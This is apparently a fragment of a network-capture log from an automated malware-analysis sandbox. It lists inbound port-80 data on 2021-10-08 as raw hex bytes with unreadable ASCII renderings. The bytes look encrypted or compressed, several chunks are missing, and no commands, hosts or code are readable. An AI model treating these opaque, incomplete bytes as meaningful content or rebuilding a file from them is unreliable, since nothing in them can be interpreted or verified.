2021-10-08 15:51:51 UTC	80	IN	Data Raw: 6e 8f cd 1f f8 1a 45 bb 3b bb ef c1 9f 3b 2c 38 4b 12 a1 36 b8 97 b4 9e 41 a3 9d 93 cf 37 8b c4 85 ed 78 a3 44 a9 ef 8c 63 b8 58 12 0d 30 b0 94 a2 1c 5f 79 88 c9 aa b2 f9 c9 e9 fd a6 51 ca f6 f0 8c 48 2c c3 4f fc 74 2c 7a 14 a5 2e 41 1d 7f 22 e8 0c 97 4e 24 b9 a7 72 7d 9e 3c db a4 db 5c e6 64 e1 35 29 6c 4a 9b 31 ee c2 13 b0 30 dc 5c f8 44 36 b8 c5 95 46 85 7a 15 97 87 63 f0 f8 e4 15 a0 ae 68 81 3a f1 9c b6 af af 67 3d 99 fa 07 3e 4a fe 4c 25 c7 7e 34 71 54 70 96 e8 f0 73 9a bd f3 71 a8 05 b9 c4 16 fa 5e ea 24 a6 bd 41 6f 50 ec f5 f9 63 cc a8 dc 3f 8b c4 6d 09 d0 ea aa 86 5d ae 3a a9 89 02 26 74 55 f2 59 90 c8 e2 6c fe 5c 63 b6 af af 61 2f b6 78 7b 85 43 6d bc df d5 89 04 9f 10 a9 51 9f b2 06 d4 c3 1a ff 2a 22 62 b1 1f ed 03 bc cf be 71 aa 46 f4 f8 4c 2c Data Ascii: nE;;,8K6A7xDcX0_yQH,Ot,z.A"N$r}<\d5)lJ10\D6Fzch:g=>JL%~4qTpsq^$AoPc?m]:&tUYl\ca/x{CmQ*"bqFL,
2021-10-08 15:51:51 UTC	81	IN	Data Raw: d9 88 2f 5d 25 9e 41 e7 9d fa d8 e6 04 cf 37 ca af 06 91 65 0c 09 5b 20 12 f2 e0 a5 15 45 00 c5 1f 90 22 fb e4 2d f4 fb a1 c9 29 a9 30 7c 37 85 6e 22 5a 17 b4 45 eb 3a 1b c8 a7 96 64 f3 8e 5a d4 ff ab a0 0c d1 3c 17 37 e0 e0 a1 83 a1 c9 68 8a 09 5b 61 65 37 ca ea b2 74 dc 96 67 c2 98 72 92 70 d1 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f3 87 82 f9 9a 3d dc d4 c3 5b 69 91 2f 92 da d2 fe 61 9c b4 fc 24 1c 09 f4 97 be 91 5b a3 32 c1 e9 5e 66 3a 99 02 c5 1f 90 21 9d 3a 5e af 11 ed b8 63 b0 b4 fd 5a c3 93 57 4a 74 20 4f 88 0d 65 38 48 83 c5 d8 ca de de 2f cb ad eb 0e 27 61 d9 bb 5a 17 7d 72 d8 32 dd d8 ca 48 f3 95 26 dd 04 44 78 92 e5 97 31 7b 8e 9b 60 27 b8 f5 97 45 96 ad da a7 2c 72 fa dc 42 6b 87 71 d5 86 eb fb 7b e6 1f cd ba 5e Data Ascii: /]%A7e[ E"-)0\|7n"ZE:dZ<7h[ae7tgrp=3K n=[i/a$[2^f:!:^cZWJt Oe8H/'aZ}r2H&Dx1{`'E,rBkq{^
2021-10-08 15:51:51 UTC	83	IN	Data Raw: 4f 67 5f 59 75 2e 4c 3c 56 94 29 bc 75 a0 b9 fd a6 55 12 f1 cf 53 7e a7 b3 98 5c ec 9d cc d7 0b 60 ac 63 3f 22 e8 0b 9f c4 db 30 4a 25 e6 9d cc d4 af a9 b4 07 32 5c d0 d4 b2 0a 9d bf 11 6e dd a6 aa a1 36 47 f0 43 8b e0 8c 47 94 5b 4e f5 e2 87 ee 4f 63 5f 4e f3 ce b5 f9 9c 2f 49 0a 22 e8 f4 10 ec fd e3 16 9e 25 cf 53 7f 19 f5 e2 87 ee 02 ca ab ed 7f 88 f2 f3 8e 1b 86 08 92 4b 98 59 4a 13 01 26 55 63 51 6c c9 29 a8 56 6b b8 7f 88 0d 65 38 4c 37 a4 30 5a cf 53 7f 19 f5 e2 87 ee 02 ca ab ed 7f 88 f2 f3 8e 1b d4 ab 98 57 79 0d 34 26 53 63 47 81 1e 69 42 64 b6 75 a0 b9 fd 59 1b 86 08 9c 55 7f 14 a4 34 30 57 63 42 06 b0 2d b2 72 d8 c0 6c 36 b8 7f 77 64 e3 0f 18 8c 62 d1 57 57 7c 9b d4 a1 8d ee 02 ca ab ef 7b 92 da 2d b2 72 9a 49 91 c2 eb 1f df 2f d8 af 8e 69 30 Data Ascii: Og_Yu.L<V)uUS~\`c?"0J%2\n6GCG[NOc_N/I"%SKYJ&UcQl)Vke8L70ZSWy4&ScGiBduYU40WcB-rl6wdbWW\|{-rI/i0
2021-10-08 15:51:51 UTC	84	IN	Data Raw: 45 15 b8 68 c0 d2 fc ac db a4 05 dc d7 0a 55 ba 26 de 24 3b c5 f7 cb 7e 0b 9f ce f0 ef 70 96 a5 2d 4d 01 a9 34 42 25 dd 35 7d 86 5d a8 5a df d6 6c 6a 3b 2c 08 ee ea ab b1 10 13 79 0e 0f 91 e7 fa e0 1f 6f 52 63 33 81 3f 89 37 32 6b ca 73 d1 c3 e5 4b 6f b8 d0 45 14 ff 28 ce 49 b0 e6 10 13 8c 09 b3 f4 51 4b c6 1a f8 4f 8e 1b 86 0b 93 24 13 72 d8 8c 9e b9 2f 35 e5 e5 08 e9 89 eb 7b 2c 6c ef ec a8 9a 0b 33 91 5b 55 5b 20 78 e6 85 85 85 85 8a a8 b6 f0 52 4b 71 96 73 a2 a0 b9 fc db 32 d7 88 0d 24 22 ff c3 0a 54 eb 22 4e db 94 1a 04 8e 93 5f 2f 49 d5 cf 53 3d 27 c7 24 5d 1b 67 55 47 30 0a 31 30 6c c9 69 cf f4 4d a6 0c b9 e9 9d 40 a1 36 dd b0 ae 97 4e 87 e2 0d 65 38 4c 7e 4e 79 2d 3f dd 18 c1 a2 23 89 06 b0 34 1b dc 17 4e 7e 0b 68 96 c6 61 a4 80 72 27 5c a8 7d 9a Data Ascii: EhU&$;~p-M4B%5}]Zlj;,yoRc3?72ksKoE(IQKO$r/5{,l3[U[ xRKqs2$"T"N_/IS='$]gUG010liM@6Ne8L~Ny-?#4N~har'\}
2021-10-08 15:51:51 UTC	86	IN	Data Raw: 06 d4 28 a7 28 d9 b5 8b 7c 36 cc b0 6d 4d ff 12 25 15 6e b0 6d 4c 7d 72 23 18 d0 c4 46 eb 8b 1f 4a fc db ab 1e 0d a1 48 25 cd f0 5a c7 7f 87 61 d0 45 ef d6 21 56 6b b8 8a ed 68 3c 13 fe 28 67 04 33 a8 4a fe 4c 25 c7 7e 34 71 aa a1 37 f7 70 10 67 c2 67 c6 fa f7 5b ab 1d de 56 b4 ff cf 07 a9 b8 80 b8 b9 f7 f0 52 4b c9 f1 02 99 b5 93 4b 71 00 05 da 11 33 99 ec 0d 8e e4 15 7c 6c 20 d1 c3 e5 67 7b 85 7d 37 47 f0 46 57 a5 ba 95 25 fa 46 37 90 e0 d3 18 00 3a ac 9f 2c 2f b6 7b 6c 71 00 c9 c2 98 33 c0 ea 10 10 a9 57 17 7d 72 d0 00 de 30 60 53 f2 f2 15 90 20 12 f1 8b 2c 7a c2 73 5a 9e 41 74 34 be cb a5 d2 bf 11 66 01 70 38 4c 7c f0 a2 a3 31 fe a3 cd 33 c0 9b 00 82 15 78 e6 ef 30 d1 c0 d6 43 e6 ef 84 07 ec ab 0a 84 fc db aa da 3a 04 90 cb 77 9b 45 15 25 76 e1 63 33 Data Ascii: ((\|6mM%nmL}r#FJH%ZaE!Vkh<(g3JL%~4q7pgg[VRKKq3\|l g{}7GFW%F7:,/{lq3W}r0`S ,zsZAt4fp8L\|13x0C:wE%vc3
2021-10-08 15:51:51 UTC	87	IN	Data Raw: ac 90 dc d5 af 2b 67 b4 b0 e4 fa 51 09 4b bc 89 87 cc 3b 18 d6 9e 98 ba 87 f8 c3 23 8d d7 c0 93 a7 d7 79 80 09 d2 b5 8e 0b 2e 1f 84 4d 74 ea 13 b5 70 18 76 36 ce e6 b8 d6 58 5a c5 0f 22 e8 f4 10 ee 78 0e 24 97 69 c9 7a 28 7d 62 fa e0 20 86 07 96 aa 5e a7 d5 c8 4f c0 18 27 28 75 cf f4 4b a4 af 15 87 5e 4f 03 4c 7f c6 4a b1 64 a6 1b 79 67 49 2d 88 0d 65 3a fe c0 55 99 45 60 76 6a 92 76 71 96 d1 c3 e5 b2 9a 38 0d 1e fd 07 95 f7 67 c2 92 67 d5 b9 fd dd 5e 4f 03 0d 6f e4 4b fb 13 b8 0b b8 0b 33 03 11 37 91 fc 7b 83 6b b8 7f 7d 5a 77 a7 28 d9 ab df b6 7b 2c a7 bb a6 55 53 39 e8 9c 2d 3b b7 a7 8e 41 22 24 cb 5b df a5 51 43 19 7e f1 ea 10 2a a1 36 b8 61 59 f3 49 7e 27 28 36 32 c2 dd 62 b5 bf 9a c8 2c d0 45 09 26 c9 ee 89 5c 28 0f 15 78 1d 08 92 2d ed 0b 40 d6 ac Data Ascii: +gQK;#y.Mtpv6XZ"x$iz(}b ^O'(uK^OLJdygI-e:UE`vjvq8gg^OoK37{k}Zw({,US9-;A"$[QC~*6aYI~'(62b,E&\(x-@
2021-10-08 15:51:51 UTC	88	IN	Data Raw: ed 83 09 a4 af e3 1c e1 60 27 aa b5 fa 96 d1 c3 13 15 90 dc 92 ae 98 76 68 d8 8d 12 f1 02 3e 1f 19 7d 37 41 02 97 3c aa 1b 0f 9b 31 5d 68 49 93 f1 da 32 fa 9c d1 b7 ab 21 1e ce e8 11 e5 93 58 96 64 5e 58 66 3b 98 db 54 ce bd e0 41 e3 d5 46 2f ca 23 94 a2 4b 90 70 2b e8 79 6c 35 80 3f 25 db dd a6 aa a0 be 0b ed 7f 88 04 03 a4 50 0d 99 f5 18 f7 dd d2 40 a0 b8 78 73 d7 b4 89 71 ad 22 96 c2 13 26 e1 e8 f4 18 3d 85 81 2d 4d f7 13 b2 f9 4c f7 90 65 b3 0b 9f cb 8c fe d7 b4 f6 72 30 39 8e 76 11 cf 36 f5 93 e6 93 cb 23 12 e6 91 a0 ad fd d0 c5 e0 1f 6f 58 e4 6b 4c 09 5b 2c 52 08 ca d7 49 1e 1a 76 61 2f b6 7b 65 45 6a cf 42 9b b6 06 57 df d5 aa d5 13 73 1a 89 4c bf 4a 67 f9 1f 94 0d 31 30 1d 8f 16 e2 b4 89 87 01 8b 1f 42 57 1b a2 3f 22 1b a2 3f 22 13 57 43 6f 74 d8 Data Ascii: `'vh>}7A<1]hI2!Xd^Xf;TAF/#Kp+yl5?%P@xsq"&=-MLer09v6#oXkL[,RIva/{eEjBWsLJg10BW?"?"WCot
2021-10-08 15:51:51 UTC	91	IN	Data Raw: 91 b2 fb c5 46 37 90 e0 d3 39 9f 3b db df 98 b8 7c a5 59 3b 5a fa 2f 49 91 a2 0a f8 31 d3 14 35 f6 e9 33 49 f5 93 ab d7 a3 cc 02 ca ea e8 28 87 40 d4 c3 1a fb 5e cf c7 af bc db b8 0b 35 55 d1 61 ca 20 e2 0e 18 00 dc a4 b9 c1 e9 89 af f7 70 27 e6 62 b1 ae 4c a7 bf 01 c1 72 81 25 c4 5d 16 fa 1f 80 93 4f fb e4 61 df b5 06 2b b4 ee eb b8 7f 88 f5 9d 57 eb 3e d1 3c 17 59 ad 8e 0b e9 12 a8 03 16 3a 62 6f 24 dc 53 0d 65 37 15 90 d8 88 86 30 68 3f d5 cd cf 72 53 f9 c9 a2 4b fa 0f 83 68 38 09 d0 4e d4 4e 97 5a da 80 06 c4 16 06 91 29 88 84 67 0d 9a 5c a3 8c 32 91 ca fe e8 c7 db ab 16 5b c8 5b 65 b3 f4 10 fc ed 68 38 09 d0 9a b1 8b a4 af 8e 1b c7 00 11 06 81 bc b9 fe 6d c5 e7 24 95 58 d4 4a be bd f8 de 58 75 d4 96 2e 74 51 cb ed db 0a 82 a3 97 d5 15 87 92 ae ae e3 Data Ascii: F79;\|Y;Z/I153I(@^5Ua p'bLr%]Oa+W><Y:bo$Se70h?rSKh8NNZ)g\2[[eh8m$XJXu.tQ
2021-10-08 15:51:51 UTC	95	IN	Data Raw: 8f 9d b7 86 8b 98 75 d4 3c a9 22 5c 4b 3c dd 8c 9d 4f 88 0d 65 39 10 04 1c 82 fa 58 12 c4 e1 63 c8 24 57 1f c8 2c 2b ea 73 a2 c0 79 e3 32 69 14 a6 95 27 60 53 f2 5e fc cc e0 e8 34 c1 d6 43 25 61 d0 eb 04 27 f3 86 c8 24 8c d5 1d d5 19 dc 28 d9 68 7e 1c cf bc 8d e7 aa da 2d 4d da c7 cc 76 6a 38 ae e8 27 28 d9 b0 48 42 8c 12 b7 75 b2 07 1b c1 e9 89 aa 63 db 54 8f 9f 86 e0 37 41 e6 a9 57 e8 c7 61 39 b2 9f 41 af e2 8d 12 f5 d5 cd cc 4f 52 35 2d e2 ed c6 2f 46 e5 b6 f0 f8 e5 44 4a 9f 91 f5 c5 4c 7c b0 e0 23 c2 c6 fd 61 a4 5c 67 be 8e 1b 86 08 dc 58 fd 59 e4 c2 b7 16 f5 e7 aa da 15 f3 8f 8d df 98 33 c0 92 77 8c c0 18 fb e6 64 46 e5 93 58 67 07 be 8e 5a 8f cd 92 24 ae 68 81 70 0b 6d c7 db ab b2 76 09 0b 68 87 07 52 cc 39 31 44 4c f0 ef 84 42 68 dc 76 e0 52 74 23 Data Ascii: u<"\K<Oe9Xc$W,+sy2i'`S^4C%a'$(h~-Mvj8'(HBucT7AWa9AOR5-/FDJL\|#a\gXY3wdFXgZ$hpmvhR91DLBhvRt#
2021-10-08 15:51:51 UTC	98	IN	Data Raw: df a1 f5 e2 0d 65 79 1b 42 dc c8 d2 bf 50 0e ab e4 15 58 10 88 3d 27 c7 24 5d 2d 10 84 56 54 bc 66 30 6c c9 29 a8 74 dc d7 4b fb 5e 58 66 44 69 42 64 b6 1e 78 94 7d 72 d8 cd 37 35 3a ae 97 b1 ef 84 66 c8 cb 4f 45 eb 7b 6d 49 0a 22 e8 0b a3 cc b0 2c a7 9f e9 f5 53 86 cb 73 a2 a0 b9 fd 90 0a 34 81 7c b1 e7 55 7a fb 28 42 3d 81 26 e1 50 86 49 7d 3a 54 70 f3 07 32 0e 18 9b ba c4 95 b1 87 df 9e 72 34 c9 7c f0 07 a9 4a 77 25 18 9f c4 9d 40 ca ab a0 c0 f3 8e 1b 79 fc 24 5d a3 ad e6 ef 7b fe 28 67 bb 67 3d d8 32 ac 63 72 5e c7 24 1c f6 84 03 0d e3 07 56 94 d6 58 99 f4 96 4e 81 7c 0f c6 a2 0a 5b 40 5f 2a d5 e8 f4 51 8e 7b 6d 4c 83 2d b2 33 46 0e e7 71 aa f2 0c a3 4b 9a 38 4c 83 2b ad a7 51 68 00 4e 42 39 36 ac 9c c2 ae d2 56 57 17 3c 51 9c 55 02 43 82 a7 8e 41 22 Data Ascii: eyBPX='$]-VTf0l)tK^XfDiBdx}r75:fOE{mI",Ss4\|Uz(B=&PI}:Tp2r4\|Jw%@y$]{(gg=2cr^$VXN\|[@_*Q{mL-3FqK8L+QhNB96VW<QUCA"
2021-10-08 15:51:51 UTC	102	IN	Data Raw: 4b 11 91 5d 68 8c fe ee 89 1b d3 ca 54 70 51 4e 69 d6 8d 14 c5 e0 e4 9a c7 2c 6c 42 0c 09 a4 af a7 bf f9 5a 15 e0 b5 72 27 5c 21 f7 70 4b bf 9c 6d 1e df 6d 4c f7 90 63 b8 80 f9 9c b8 69 bd f3 c3 92 cd f5 18 63 66 30 c6 5d a4 c6 4a 77 d3 4e 89 cc 3b 4f 56 19 81 7c f0 a5 3b 2c d0 f7 3d 30 ff 20 b2 27 28 d9 b0 ec 4e 69 42 d2 b0 65 7b e6 4f 56 19 81 7c f0 b8 69 bd f3 c3 d8 25 58 12 55 47 7b 92 da 53 dd b1 ef 3a 5e af a9 57 b3 a1 44 69 42 64 6a 2d 4d 00 95 bf f9 5a 15 d0 ef 0f 96 d1 c5 8a f9 9c b6 1d 83 c3 91 0a 88 80 f9 9c 3d 21 7c 0f 96 61 ff 43 f4 9b b2 21 1e cb a5 d2 bf 10 e6 06 2b 52 db 15 90 e6 64 1a 51 83 7f 88 f4 9b 52 27 e6 62 81 83 84 73 a5 da 91 29 a8 5a 9f ed 69 bd f3 de bb ef 42 ef 34 17 f6 ea 07 af 98 db e4 af 67 0d 9a 3c 26 de d3 02 41 e2 e5 6d Data Ascii: K]hTpQNi,lBZr'\!pKmmLcicf0]JwN;OV\|;,=0 '(NiBe{OV\|i%XUG{S:^WDiBdj-MZ=!\|aC!+RdQR'bs)ZiB4g<&Am
2021-10-08 15:51:51 UTC	106	IN	Data Raw: 4e 7e 0b 36 41 0a 22 e8 32 31 53 0d 25 7f 1b 27 a2 f9 64 fb 2a d5 b9 7a 19 69 42 25 e5 64 17 85 d0 37 ca ab e0 b4 9f 3b 2c d2 47 18 ff ab e0 be 67 c2 67 6b 71 bd f3 71 93 98 db 54 cf d5 72 79 69 f0 fb ec 76 1e f2 75 7d 9a 38 0d 19 f1 28 da 87 07 56 94 28 a2 a2 b4 89 72 e0 08 d9 4f 02 f4 f9 9c 3d d8 30 bd 03 05 b9 81 7c f0 07 b6 ff a4 50 83 80 f8 37 ca ab e1 fc a0 49 f7 70 50 86 08 d9 cd b7 f1 09 59 1b 8d b4 76 e1 62 da 3b b1 9b f2 33 b4 f6 17 7d 7a c6 a2 4b fb db bd 0c e2 e4 b6 ff a4 50 86 b7 00 e8 f4 10 ec 05 d5 49 75 5f 6a c5 32 69 36 5a e1 e3 65 38 49 c8 a7 d7 4b 60 28 29 91 dd d9 4d ff a1 f4 d3 ca 8b 1d ef b4 89 eb 7b 2d 5b f9 f4 45 2b 9e 99 3e 09 a2 3e 13 73 30 39 a4 50 86 08 d1 85 69 c9 7c 33 9d e6 1f 7b 92 da 84 be 67 fe d7 b4 2b ca 43 1a 41 6f 50 Data Ascii: N~6A"21S%'d*ziB%d7;,GggkqqTryivu}8(V(rO=0\|P7IpPYvb;3}zKPIu_j2i6Ze8IK`()M{-[E+>>s09Pi\|3{g+CAoP
2021-10-08 15:51:51 UTC	110	IN	Data Raw: 24 1c 63 df d5 13 73 4a b5 a4 d0 ba c5 1e b5 15 f3 db 54 83 42 39 4e 81 3c 57 af 06 5f 7f 77 6c 0b 3d 58 99 f5 92 9d 53 86 5d e5 e7 71 41 20 4f fc db ab 2f 5e f7 90 65 b3 a4 5c e6 64 e6 fb e4 61 49 a5 ca ee 89 e9 61 c4 1d 8b d4 c2 20 15 0c e2 e5 68 c0 83 fd 27 4f 88 58 59 90 20 53 9e 01 6d b3 34 c9 29 e9 e5 28 03 b3 34 c9 29 e9 e5 24 39 31 7b e6 ef c5 8c 5a bb f8 d9 4e 81 3d 5f 82 d3 c2 58 12 32 63 cb c5 e0 1f f6 cf de 18 ff eb ac 17 15 68 49 91 fb f8 40 9f f7 98 72 5f 82 fb 5e 87 03 28 16 05 35 c5 5f fd cb 46 3b 13 40 b3 7f 22 d4 c2 98 72 5f 8e 36 c4 5d ae ab bc 72 33 3f 22 70 c1 ff 68 c0 d3 96 12 99 a5 5b 44 30 60 f6 d5 75 5f 6b c0 37 cf c8 87 03 28 16 05 35 c5 5f fd 93 cf 62 71 66 57 9c 68 03 11 8b 1f cb 70 8c f6 50 0d 8f 76 1e f2 6b 0f 80 3a ae 97 c6 Data Ascii: $csJTB9N<W_wl=XS]qA O/^e\daIa h'OXY Sm4)(4)$91{ZN=_X2chI@r_^(5_F;@"r_6]r3?"ph[D0`u_k7(5_bqfWhpPvk:
2021-10-08 15:51:51 UTC	114	IN	Data Raw: 40 5f 6b 35 2d b2 33 bb af ea b9 70 23 99 f4 6a 0c e2 a4 22 ef 84 42 1f 18 ff ea 8b 94 29 e9 0d 25 9e 00 b6 73 5a df 22 23 99 f4 63 23 99 f4 6c e9 76 a0 35 dd 59 5a e4 06 d4 82 8d b9 02 8b ef 18 ff ea 8b bc 8a 50 fd 5a 9e 00 b6 4b fa 1f 90 3d 18 74 1f 6f af 98 70 3b 11 e5 64 3f 14 c6 b2 f9 5f 71 0f 96 d1 c2 9b 52 48 f8 1d fe fa 9a c1 e1 fa 1f 90 df a1 70 12 7a fe 57 de 5e be 65 c7 db aa 40 b7 3d 53 04 ba 85 85 7a 14 0c 63 fb 2a d5 b9 f9 2b 45 e7 32 b3 c0 e7 55 51 33 3f 22 88 55 fa e0 1f 6d 45 03 6c 8a 9a ec 76 a9 a9 dc db 2c ac 47 f4 9b b6 33 3f f9 98 b8 7f 88 f1 07 be ae 2b 26 f5 18 27 28 77 37 5a 5d 7e aa 01 12 3c 28 e6 6a 3b 2c d3 47 18 f3 c9 a4 af 15 86 8e f3 49 7e 0b 9f 3e 97 59 1b ec 02 35 3b 5b c8 60 27 a4 25 9e 41 1d 74 22 96 de 50 79 97 4d de 33 Data Ascii: @_k5-3p#j"B)%sZ"#c#lv5YZPZK=top;d?_qRHpzW^e@=Szc*+E2UQ3?"UmElv,G3?+&'(w7Z]~<(j;,GI~>Y5;[`'%At"PyM3
2021-10-08 15:51:51 UTC	118	IN	Data Raw: 98 b6 35 c4 76 af 1d 00 8d 72 d9 fd ea 8b 94 68 b1 d3 44 ca a4 50 86 08 26 04 cf bd 18 8a ee 87 ea 8c 16 c2 a4 d0 dc a3 0d e0 32 0d 9f 4f 54 d9 8f 16 39 ce b5 f9 08 1d 0a 22 e8 64 1f 78 e6 ef 84 83 39 da f6 41 6f 50 c7 55 16 42 64 f7 e9 76 42 68 e4 ae e3 6e 25 9e 00 b4 76 42 64 b6 84 fc 01 44 4d bb 8c 06 a1 c8 a7 96 5e 53 30 ba 85 c4 ed 7c 53 05 75 1b 0d 65 79 18 07 f5 97 95 e8 7f 77 25 ee f6 b6 6b 63 77 ef d4 b7 3e df a1 36 f7 d5 ae 3c 56 94 29 3c 72 dc 10 13 8c e9 1a c0 12 f1 c9 a4 93 b7 77 b6 48 73 1b fd 5e 06 c4 14 27 90 20 53 76 81 dd 49 7c 22 24 1c 48 08 8d 38 5c 2a f8 29 a8 1b fd 86 a9 cc 39 1c 3a 51 49 8e 47 51 18 76 33 f3 8e 5a e4 12 50 86 49 72 4c df 9e 72 27 5c 20 47 18 ff ea 7f e3 c6 a3 c1 56 52 8b d5 c1 82 5f 30 4d ff ab a0 c1 82 c3 99 b5 b8 Data Ascii: 5vrhDP&2OT9"dx9AoPUBdvBhn%vBdDM^S0\|Sueyw%kcw>6<V)<rwHs^' SvI\|"$H8\*)9:QIGQv3ZPIrLr'\ GVR_0M
2021-10-08 15:51:51 UTC	122	IN	Data Raw: 63 6d 13 6b 83 03 8f 16 61 30 e4 fa 3b b7 22 1f b4 32 e3 6c 22 8c 09 86 18 db 10 30 31 9f 80 24 11 1c 97 51 d7 4b ba 23 f5 8e c3 12 d5 02 17 5a 75 87 01 b7 01 b7 86 e0 26 aa 89 04 c2 ed 40 db ab 1e f0 96 c6 64 3d 0c 69 52 af a6 d8 d3 3d fc 20 29 57 e8 55 85 6d 8a 9a 25 ea 38 c8 58 66 41 88 e5 aa d5 92 ae 60 88 41 6f 44 4d bb 8e 0b 44 2d 3b 13 40 5f 2a 2a 2b 89 8b 53 0c 51 f8 91 58 12 19 45 68 97 e7 22 87 49 ae 36 1d 8a a1 cb c5 df 6d 48 0f 4d fb 9a c7 db f5 4f eb b8 0b 6c bd cc 34 bd f3 73 a9 34 81 f7 4c f7 56 1f 90 20 12 f0 23 9d 78 3e d1 ce 3e 0b 36 14 f5 93 ea a8 5a 9e 41 e0 1f 6f af 15 78 e6 a2 0a dd 59 1b 84 fc db ab 1e ce ee 5c fc 79 78 22 94 ea 73 82 75 a0 b9 ea 6c 21 99 91 e6 64 d0 b4 52 df d5 20 02 ee 4e 0a bb 57 13 57 53 86 58 93 83 c4 16 9c c2 Data Ascii: cmka0;"2l"01$QK#Zu&@d=iR= )WUm%8XfA`AoDMD-;@_**+SQXEh"I6mHMOl4s4LV #x>>6ZAoxY\yx"sul!dR NWWSX
2021-10-08 15:51:51 UTC	127	IN	Data Raw: e2 6e e9 05 51 49 84 3f d8 6e c1 16 fa 1f 6f 75 a4 15 f2 f7 dd d1 3c dc d1 b7 fe 28 21 8e f2 0c 03 09 9d bf f2 49 33 c0 7e b1 29 88 ef c1 d0 45 14 0b 98 b3 0b 68 85 0e e7 71 52 c6 2f b9 00 3a ae 96 d6 70 50 8e 5e 2c 2f b6 7c ad 62 be 8e 25 1d ab 68 a4 60 53 69 42 24 81 6a ac 36 87 b9 fe 5d a8 a6 10 65 e0 b5 70 07 03 c5 cd 00 92 73 09 8f 59 98 df d5 13 73 5a 9e 41 9b c3 63 4a 77 64 b6 7f 88 f2 f3 71 55 12 88 74 dc d7 4b f8 e5 93 58 66 bb c4 c0 76 6a 9f 9a c8 4c 83 7f de da 3b 10 13 8c b9 a9 34 be cb a3 cd 73 cf 7a 83 90 a9 b8 d9 16 a0 86 3b 2c d0 0e 07 be 8e 1b 86 0a 67 3e d1 75 97 3a ae 97 03 c3 f2 0f e2 b6 6c bc ba bd 8c 15 f3 90 55 5c 5c 5c 11 3f 35 c5 1f 91 a2 f2 f3 71 ab 0d f0 8a d2 34 71 21 55 97 4e 7e 25 a1 21 c5 e0 1f 41 57 ff af 80 a9 30 7c 7d 22 Data Ascii: nQI?nou<(!I3~)EhqR/:pP^,/\|b%h`SiB$j6]epsYsZAcJwdqUtKXfvjL;4sz;,g>u:lU\\\?5q4q!UN~%!AW0\|}"
2021-10-08 15:51:51 UTC	131	IN	Data Raw: 82 01 b7 01 a3 25 5d 7e ac 9c c2 27 3b 3b 2f eb f0 eb 3e d7 1b d5 85 12 84 8e da 5b 20 12 f0 94 c1 ea a5 59 d4 75 50 74 55 85 c0 1e 5f 7a b8 80 f9 9c 32 86 0d 13 61 d7 c8 a7 d7 4b f9 26 fd e3 ec ef 6f 50 c7 a2 cf 22 a1 c6 b9 77 29 51 88 0d 65 38 4e 3b f6 63 f1 b0 b1 ba 0e e7 71 55 00 7d 76 52 74 23 67 b7 7b 62 fc dd d9 44 1d c5 e6 6f 53 be 9c 49 b3 0d e5 6e 7d 4a 03 09 a2 cb 2f 05 6e ba c2 61 af ea 4b 3c df 5e 10 ee e9 77 d3 be 71 a1 e3 8e bc ff 26 21 95 ac 73 e3 67 3d d8 c5 a5 2d 4d 01 81 f9 93 f7 61 af 29 f7 69 6b be 07 19 80 8c b8 72 dd ba 59 56 1f 50 b4 b1 66 ec 3b 5a 61 d0 44 80 7c ff f8 e3 e7 b2 ae 25 15 bb 06 a3 11 23 a2 b7 b0 e6 5d 51 fe 21 53 84 fc db ab e4 6f 5f 79 91 22 1c e2 15 f1 65 4d 74 87 5c 5c 5f 77 ef d7 a7 92 a8 98 ba 7a 14 0a fc a1 c6 Data Ascii: %]~';;/>[ YuPtU_z2aK&oP"w)Qe8N;cqU}vRt#g{bDoSIn}J/naK<^wq&!sg=-Ma)ikrYVPf;ZaD\|%#]Q!So_y"eMt\\_wz
2021-10-08 15:51:51 UTC	134	IN	Data Raw: dc f8 f2 cf bc da 2d 4d 30 0e 0f aa d5 16 05 ae b9 3d 30 ff 20 42 9b 45 24 5b c8 61 a4 88 86 fa 94 7f 24 df 05 0f 6b af 69 bd f3 63 71 bd 0c e2 e1 63 5b 20 78 b6 84 fc f5 f4 f8 d9 c4 cd cc 4f cc df b6 b8 0b 30 c6 5d f4 67 d5 80 72 88 f2 f3 41 9d 57 d1 b7 26 aa ac e8 a2 18 6f 93 67 0c 21 94 99 b6 0e 27 26 de 24 e3 f4 f8 16 8f 61 65 03 b0 25 15 6c bd de d2 a8 2e f4 19 98 47 20 2b 3d 1b d8 92 7e 24 35 12 47 ff 68 76 ee da a6 ae 50 a6 ba 05 52 fc 5e 58 19 89 fd c7 db d4 3c 29 22 37 21 15 7b 1a 7e 0f e9 7e 86 69 b9 82 01 16 70 f9 e8 52 78 2f 8f 4c f5 91 d4 12 c8 66 32 c2 ca 20 11 1a d6 c1 ea b8 0b 63 47 30 30 ee 8b 52 02 99 e2 b3 37 91 fc 7b 37 93 78 93 7c 75 14 f1 ad a2 b4 52 8f 62 b3 7c f4 34 16 71 75 5b 22 60 f6 29 ae 1a 45 d7 4b 70 f7 9c b6 5a ea 23 1c 0d Data Ascii: -M0=0 BE$[a$kicqc[ xO0]grAW&og!'&$ae%l.G +=~$5GhvPR^X<)"7!{~~ipRx/Lf2 cG00R7{7x\|uRb\|4qu["`)EKpZ#
2021-10-08 15:51:51 UTC	138	IN	Data Raw: 45 68 00 4e 42 39 36 ac 9c c2 4e db bd cf 37 8a 76 15 10 fc ad 82 a7 8e 41 22 24 1c 48 f5 e7 74 23 b9 8b f0 37 35 a1 c9 69 25 73 32 6b 87 b9 ee 89 da 11 91 5d ef 19 69 8b a7 47 33 3f 22 d4 09 b3 66 7b e6 ef c5 8c 1e 28 d9 8f 16 fa 5e 34 4e a4 af 2a a1 c9 68 53 1d ae 97 71 de db 15 eb 63 16 05 91 29 a8 1b 15 6c ec 02 0a 56 94 68 52 8f b8 7f b7 75 5f 6b d5 4e a4 af 2a a1 c9 68 52 87 af 15 b8 0b 60 ed 12 e1 46 91 62 3a 51 49 67 29 8d 66 7b e6 ef c5 8d 81 59 e4 2a a1 c9 68 52 97 94 d6 08 52 8b d5 d4 e3 42 9b 7a 60 ac 22 85 a1 ec 02 0a 56 94 68 52 a3 e8 0b a0 cd 33 81 ee 2e 11 91 62 3a 51 49 67 0d 40 a0 86 83 80 b8 12 c5 3a ae a8 d1 3c 17 ef bc af 15 b8 0b 60 ed 12 cd 16 05 91 29 a8 1b 14 b5 dc 28 e6 64 b6 3a c3 5e 82 01 88 86 08 98 a1 81 59 e4 2a a1 c9 68 52 Data Ascii: EhNB96N7vA"$Ht#75i%s2k]iG3?"f{(^4NhSqc)lVhRu_kNhR`Fb:QIg)f{YhRRBz`"VhR3.b:QIg@:<`)(d:^YhR
